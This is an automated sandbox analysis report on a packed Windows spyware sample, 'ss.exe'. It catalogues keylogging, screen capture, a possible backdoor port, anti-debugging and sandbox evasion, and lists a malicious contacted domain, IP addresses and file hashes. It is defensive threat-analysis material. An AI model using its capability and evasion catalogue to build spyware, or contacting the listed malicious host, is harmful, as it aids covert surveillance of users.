Analysis Report
Overview
General Information |
|---|
| Joe Sandbox Version: | 22.0.0 |
| Analysis ID: | 521716 |
| Start time: | 13:53:57 |
| Joe Sandbox Product: | Cloud |
| Start date: | 03.04.2018 |
| Overall analysis duration: | 0h 6m 9s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Sample file name: | ss.exe |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43) |
| Number of analysed new started processes analysed: | 6 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies |
|
| Analysis stop reason: | Timeout |
| Detection: | MAL |
| Classification: | mal72.spyw.winEXE@4/2@1/2 |
| HCA Information: |
|
| EGA Information: |
|
| HDC Information: | Failed |
| Cookbook Comments: |
|
| Warnings: | Show All
|
Detection |
|---|
| Strategy | Score | Range | Reporting | Detection | |
|---|---|---|---|---|---|
| Threshold | 72 | 0 - 100 | Report FP / FN | ||
Confidence |
|---|
| Strategy | Score | Range | Further Analysis Required? | Confidence | |
|---|---|---|---|---|---|
| Threshold | 5 | 0 - 5 | false | ||
Classification |
|---|
Analysis Advice |
|---|
| Sample HTTP request are all non existing, likely the sample is no longer working |
| Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook |
| Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--" |
| Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook |
Signature Overview |
|---|
Click to jump to signature section
AV Detection: |
|---|
| Antivirus detection for unpacked file | Show sources | ||
| Source: 2.2.ss.exe.400000.0.unpack | Avira: | ||
| Source: 2.0.ss.exe.400000.0.unpack | Avira: | ||
| Source: 2.1.ss.exe.400000.0.unpack | Avira: | ||
| Multi AV Scanner detection for submitted file | Show sources | ||
| Source: ss.exe | virustotal: | Perma Link | ||
Key, Mouse, Clipboard, Microphone and Screen Capturing: |
|---|
| Contains functionality to register a low level keyboard hook | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00408C80 | |
| Contains functionality for read data from the clipboard | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00404620 | |
| Contains functionality to record screenshots | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00437340 | |
| Contains functionality to retrieve information about pressed keystrokes | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0040EEC0 | |
Networking: |
|---|
| Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources | ||
| Source: Traffic | Snort IDS: | ||
| Social media urls found in memory data | Show sources | ||
| Source: ss.exe | String found in binary or memory: | ||
| Downloads files from webservers via HTTP | Show sources | ||
| Source: global traffic | HTTP traffic detected: | ||
| Found strings which match to known social media urls | Show sources | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Performs DNS lookups | Show sources | ||
| Source: unknown | DNS traffic detected: | ||
| Tries to download non-existing http data (HTTP/1.1 404 Not Found) | Show sources | ||
| Source: global traffic | HTTP traffic detected: | ||
| Urls found in memory or binary data | Show sources | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
| Source: ss.exe, runings.zip.2.dr | String found in binary or memory: | ||
Remote Access Functionality: |
|---|
| Contains functionality to open a port and listen for incoming connection (possibly a backdoor) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00414C40 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00415590 | |
Stealing of Sensitive Information: |
|---|
| OS version to string mapping found (often used in BOTs) | Show sources | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
Persistence and Installation Behavior: |
|---|
| May use bcdedit to modify the Windows boot settings | Show sources | ||
| Source: ss.exe | Binary or memory string: | ||
Data Obfuscation: |
|---|
| Contains functionality to dynamically determine API calls | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00450930 | |
| Sample is packed with UPX | Show sources | ||
| Source: initial sample | Static PE information: | ||
| Source: initial sample | Static PE information: | ||
Spreading: |
|---|
| Contains functionality to enumerate / list files inside a directory | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004403A0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00472770 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00452490 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00451070 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004726E0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00441700 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00451E00 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00440F8D | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0042B115 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00440AD7 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00440FC0 | |
System Summary: |
|---|
| Potential malicious VBS script found (suspicious strings) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Dropped file: | Jump to dropped file | ||
| Contains functionality to communicate with device drivers | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0043D1E0 | |
| Contains functionality to shutdown / reboot the system | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00452610 | |
| Detected potential crypto function | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0040136A | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004566A0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00404B30 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004161B0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0047C075 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00471240 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0040D4E0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0043C070 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0047A409 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0047B88D | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00406CD0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00483330 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00419D60 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0047C2D3 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00412570 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00421EA0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0041BF10 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0048EC20 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0048F171 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004902BD | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00437340 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004923AE | |
| Found potential string decryption / allocating functions | Show sources | ||
| PE file contains strange resources | Show sources | ||
| Source: ss.exe | Static PE information: | ||
| Reads the hosts file | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | File read: | Jump to behavior | ||
| Source: C:\Users\user\Desktop\ss.exe | File read: | Jump to behavior | ||
| Sample file is different than original file name gathered from version info | Show sources | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011) | Show sources | ||
| Source: ss.exe | Static PE information: | ||
| Classification label | Show sources | ||
| Source: classification engine | Classification label: | ||
| Contains functionality for error logging | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0042E250 | |
| Contains functionality to adjust token privileges (e.g. debug / backup) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00452610 | |
| Contains functionality to check free disk space | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0043CE10 | |
| Contains functionality to instantiate COM classes | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00451070 | |
| Contains functionality to load and extract PE file embedded resources | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00440630 | |
| Executes visual basic scripts | Show sources | ||
| Source: unknown | Process created: | ||
| Might use command line arguments | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Command line argument: | 2_2_00403AF0 | |
| Source: C:\Users\user\Desktop\ss.exe | Command line argument: | 2_2_00403AF0 | |
| Source: C:\Users\user\Desktop\ss.exe | Command line argument: | 2_2_00403AF0 | |
| Source: C:\Users\user\Desktop\ss.exe | Command line argument: | 2_2_00403AF0 | |
| Source: C:\Users\user\Desktop\ss.exe | Command line argument: | 2_2_00403AF0 | |
| Source: C:\Users\user\Desktop\ss.exe | Command line argument: | 2_2_00403AF0 | |
| Source: C:\Users\user\Desktop\ss.exe | Command line argument: | 2_2_00403AF0 | |
| Reads ini files | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | File read: | Jump to behavior | ||
| Reads software policies | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Key opened: | Jump to behavior | ||
| Sample is known by Antivirus (Virustotal or Metascan) | Show sources | ||
| Source: ss.exe | Virustotal: | ||
| Spawns processes | Show sources | ||
| Source: unknown | Process created: | |||
| Source: unknown | Process created: | |||
| Source: C:\Users\user\Desktop\ss.exe | Process created: | Jump to behavior | ||
| Uses an in-process (OLE) Automation server | Show sources | ||
| Source: C:\Windows\System32\wscript.exe | Key value queried: | Jump to behavior | ||
HIPS / PFW / Operating System Protection Evasion: |
|---|
| Contains functionality to launch a program with higher privileges | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0042E250 | |
| Contains functionality to simulate keystroke presses | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00410450 | |
| Contains functionality to simulate mouse events | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0040FE10 | |
| May try to detect the Windows Explorer process (often used for injection) | Show sources | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
| Source: ss.exe | Binary or memory string: | ||
Anti Debugging: |
|---|
| Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | System information queried: | Jump to behavior | ||
| Contains functionality to check if a debugger is running (IsDebuggerPresent) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0048B884 | |
| Contains functionality to dynamically determine API calls | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00450930 | |
| Contains functionality which may be used to detect a debugger (GetProcessHeap) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00491AAE | |
| Contains functionality to register its own exception handler | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0048D652 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0048B884 | |
Malware Analysis System Evasion: |
|---|
| Found WSH timer for Javascript or VBS script (likely evasive script) | Show sources | ||
| Source: C:\Windows\System32\wscript.exe | Window found: | Jump to behavior | ||
| Found a high number of Window / User specific system calls (may be a loop to detect user behavior) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Window / User API: | Jump to behavior | ||
| Found large amount of non-executed APIs | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | API coverage: | ||
| Contains functionality to enumerate / list files inside a directory | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004403A0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00472770 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00452490 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00451070 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004726E0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00441700 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00451E00 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00440F8D | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0042B115 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00440AD7 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00440FC0 | |
Hooking and other Techniques for Hiding and Protection: |
|---|
| Contains functionality to check if a window is minimized (may be used to check if an application is visible) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00462A00 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00462A00 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0045C7A0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004392C0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00475520 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0045F710 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00472CD0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00435EB0 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0043A180 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00472C70 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00437340 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0044F220 | |
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_004669E0 | |
| Disables application error messsages (SetErrorMode) | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Process information set: | Jump to behavior | ||
| Source: C:\Users\user\Desktop\ss.exe | Process information set: | Jump to behavior | ||
| Source: C:\Users\user\Desktop\ss.exe | Process information set: | Jump to behavior | ||
| Source: C:\Users\user\Desktop\ss.exe | Process information set: | Jump to behavior | ||
| Source: C:\Users\user\Desktop\ss.exe | Process information set: | Jump to behavior | ||
| Source: C:\Windows\System32\wscript.exe | Process information set: | Jump to behavior | ||
Language, Device and Operating System Detection: |
|---|
| Queries the volume information (name, serial number etc) of a device | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Queries volume information: | Jump to behavior | ||
| Contains functionality to query local / system time | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_00423F40 | |
| Contains functionality to query windows version | Show sources | ||
| Source: C:\Users\user\Desktop\ss.exe | Code function: | 2_2_0041271E | |
| Queries the cryptographic machine GUID | Show sources | ||
| Source: C:\Windows\System32\wscript.exe | Key value queried: | Jump to behavior | ||
Behavior Graph |
|---|
Simulations |
|---|
Behavior and APIs |
|---|
| Time | Type | Description |
|---|---|---|
| 13:55:23 | API Interceptor | 4x Sleep call for process: ss.exe modified |
| 13:56:11 | API Interceptor | 1x Sleep call for process: wscript.exe modified |
Antivirus Detection |
|---|
Initial Sample |
|---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 31% | virustotal | Browse |
Dropped Files |
|---|
| No Antivirus matches |
|---|
Unpacked PE Files |
|---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 100% | Avira | TR/Crypt.XPACK.Gen | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | ||
| 100% | Avira | TR/Crypt.XPACK.Gen |
Domains |
|---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 2% | virustotal | Browse |
Yara Overview |
|---|
Initial Sample |
|---|
| No yara matches |
|---|
PCAP (Network Traffic) |
|---|
| No yara matches |
|---|
Dropped Files |
|---|
| No yara matches |
|---|
Memory Dumps |
|---|
| No yara matches |
|---|
Unpacked PEs |
|---|
| No yara matches |
|---|
Joe Sandbox View / Context |
|---|
IPs |
|---|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| 195.216.243.130 | cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050 | malicious | Browse |
| |
| a8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0b | malicious | Browse |
|
Domains |
|---|
| No context |
|---|
ASN |
|---|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| MASTERTEL-ASMoscowRussiaRU | 1e393b6ad5c0ee0f3ad112279a5889799fb620dd80d907b8bd23e88fe6f83435 | malicious | Browse |
| |
| cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050 | malicious | Browse |
| ||
| a8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0b | malicious | Browse |
|
Dropped Files |
|---|
| No context |
|---|
Screenshots |
|---|
Startup |
|---|
|
Created / dropped Files |
|---|
| Process: | C:\Users\user\Desktop\ss.exe |
| File Type: | |
| Size (bytes): | 6868 |
| Entropy (8bit): | 5.311417081263737 |
| Encrypted: | false |
| MD5: | 92039EF35A7D4B77CF46FCA6401B33C1 |
| SHA1: | C5D06575B974470C71FF0F2493E32C9E7668238C |
| SHA-256: | 67D73BE441C1A7DEE565281EB1CA5AE47B612D6FFC109D2B706A73E0F19F3999 |
| SHA-512: | 38325D878501EFAB4738B361C508F5ACE5D56A8CEA1B423A2B718E3AFF9D09D791BB9942C08A9EA4E1447E3B6334B7CC8B205AB7FB9A309EDEE074514D3F3FF1 |
| Malicious: | false |
| Reputation: | low |
| Process: | C:\Users\user\Desktop\ss.exe |
| File Type: | |
| Size (bytes): | 123 |
| Entropy (8bit): | 4.834108065762658 |
| Encrypted: | false |
| MD5: | B9B022474BFDB5DF814922B1EAD71E45 |
| SHA1: | 6CC42E94C04B94E5524F74BED4726332846AFAC0 |
| SHA-256: | F5868BE8126450DC59DC6A24DD7A9EEDE0FD02799225CAE409A47EE50312CCAA |
| SHA-512: | 8E1284C43A0D64B36FC89BB66425D2C303E9A2C0F1D784E330B03681713B4F91B51216E791E605163C612E74C3A03D5902DEBB63EC61723BC29F04EF4DDD25DF |
| Malicious: | false |
| Reputation: | low |
Contacted Domains/Contacted IPs |
|---|
Contacted Domains |
|---|
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| runing.clan.su | 195.216.243.130 | true | true | 2%, virustotal, Browse | unknown |
Contacted IPs |
|---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 8.8.8.8 | United States | 15169 | GOOGLE-GoogleIncUS | false | |
| 195.216.243.130 | United Kingdom | 29226 | MASTERTEL-ASMoscowRussiaRU | true |
Static File Info |
|---|
General | |
|---|---|
| File type: | |
| Entropy (8bit): | 7.881366538923817 |
| TrID: |
|
| File name: | ss.exe |
| File size: | 336896 |
| MD5: | b83e77ae26e3663301648318e38ec1b2 |
| SHA1: | 2adf8fdbea965ff2237644697e5d3e966760f90c |
| SHA256: | a8026a125cd6402e34095da0fe419ed4fbb1edcc80336bb9b3cf2c9e5401ce0b |
| SHA512: | 70c5c2e50bd00ad49cf5d7753ed8b43350a047210abd761a7083813a375e9f783b1ca19c86a0b86ebb9730d3a3aebec8450bac433382b36f2a5c91882c2f5aad |
| File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................9.......8.L.......................t.............=.....................Rich............PE..L...A.>W........... |
File Icon |
|---|
Static PE Info |
|---|
General | |
|---|---|
| Entrypoint: | 0x4b6760 |
| Entrypoint Section: | UPX1 |
| Digitally signed: | false |
| Imagebase: | 0x400000 |
| Subsystem: | windows gui |
| Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED |
| DLL Characteristics: | |
| Time Stamp: | 0x573EA441 [Fri May 20 05:44:33 2016 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 5 |
| OS Version Minor: | 0 |
| File Version Major: | 5 |
| File Version Minor: | 0 |
| Subsystem Version Major: | 5 |
| Subsystem Version Minor: | 0 |
| Import Hash: | 2dead38317347de812f33c5e69b985ff |
Entrypoint Preview |
|---|
| Instruction |
|---|
| pushad |
| mov esi, 00469000h |
| lea edi, dword ptr [esi-00068000h] |
| push edi |
| jmp 00007F62148662CDh |
| nop |
| mov al, byte ptr [esi] |
| inc esi |
| mov byte ptr [edi], al |
| inc edi |
| add ebx, ebx |
| jne 00007F62148662C9h |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| jc 00007F62148662AFh |
| mov eax, 00000001h |
| add ebx, ebx |
| jne 00007F62148662C9h |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| adc eax, eax |
| add ebx, ebx |
| jnc 00007F62148662CDh |
| jne 00007F62148662EAh |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| jc 00007F62148662E1h |
| dec eax |
| add ebx, ebx |
| jne 00007F62148662C9h |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| adc eax, eax |
| jmp 00007F6214866296h |
| add ebx, ebx |
| jne 00007F62148662C9h |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| adc ecx, ecx |
| jmp 00007F6214866314h |
| xor ecx, ecx |
| sub eax, 03h |
| jc 00007F62148662D3h |
| shl eax, 08h |
| mov al, byte ptr [esi] |
| inc esi |
| xor eax, FFFFFFFFh |
| je 00007F6214866337h |
| sar eax, 1 |
| mov ebp, eax |
| jmp 00007F62148662CDh |
| add ebx, ebx |
| jne 00007F62148662C9h |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| jc 00007F621486628Eh |
| inc ecx |
| add ebx, ebx |
| jne 00007F62148662C9h |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| jc 00007F6214866280h |
| add ebx, ebx |
| jne 00007F62148662C9h |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| adc ecx, ecx |
| add ebx, ebx |
| jnc 00007F62148662B1h |
| jne 00007F62148662CBh |
| mov ebx, dword ptr [esi] |
| sub esi, FFFFFFFCh |
| adc ebx, ebx |
| jnc 00007F62148662A6h |
| add ecx, 02h |
| cmp ebp, FFFFFB00h |
| adc ecx, 02h |
Data Directories |
|---|
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbb260 | 0x300 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb7000 | 0x4260 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections |
|---|
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| UPX0 | 0x1000 | 0x68000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| UPX1 | 0x69000 | 0x4e000 | 0x4da00 | False | 0.994250704509 | data | 7.92177156162 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb7000 | 0x5000 | 0x4600 | False | 0.22265625 | data | 5.14253585569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
Resources |
|---|
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_ICON | 0xb72e0 | 0x25a8 | data | ||
| RT_ICON | 0xb988c | 0x10a8 | data | ||
| RT_ICON | 0xba938 | 0x468 | GLS_BINARY_LSB_FIRST | ||
| RT_MENU | 0xb2d94 | 0x2c8 | data | English | United States |
| RT_DIALOG | 0xb305c | 0xe8 | data | English | United States |
| RT_ACCELERATOR | 0xb3144 | 0x48 | data | English | United States |
| RT_RCDATA | 0xb318c | 0x309 | data | English | United States |
| RT_RCDATA | 0xb3498 | 0x7b | data | English | United States |
| RT_GROUP_ICON | 0xbada4 | 0x30 | MS Windows icon resource - 3 icons, 48x48, 256-colors | ||
| RT_MANIFEST | 0xbadd8 | 0x487 | ASCII text, with very long lines, with no line terminators | English | United States |
Imports |
|---|
| DLL | Import |
|---|---|
| KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess |
| ADVAPI32.dll | RegCloseKey |
| COMCTL32.dll | |
| COMDLG32.dll | GetOpenFileNameA |
| GDI32.dll | BitBlt |
| ole32.dll | CoGetObject |
| OLEAUT32.dll | SysStringLen |
| PSAPI.DLL | GetModuleBaseNameA |
| SHELL32.dll | DragFinish |
| USER32.dll | GetDC |
| VERSION.dll | VerQueryValueA |
| WINMM.dll | mixerOpen |
| WSOCK32.dll | WSAStartup |
Possible Origin |
|---|
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States |
Static AutoHotKey Info |
|---|
General | |
|---|---|
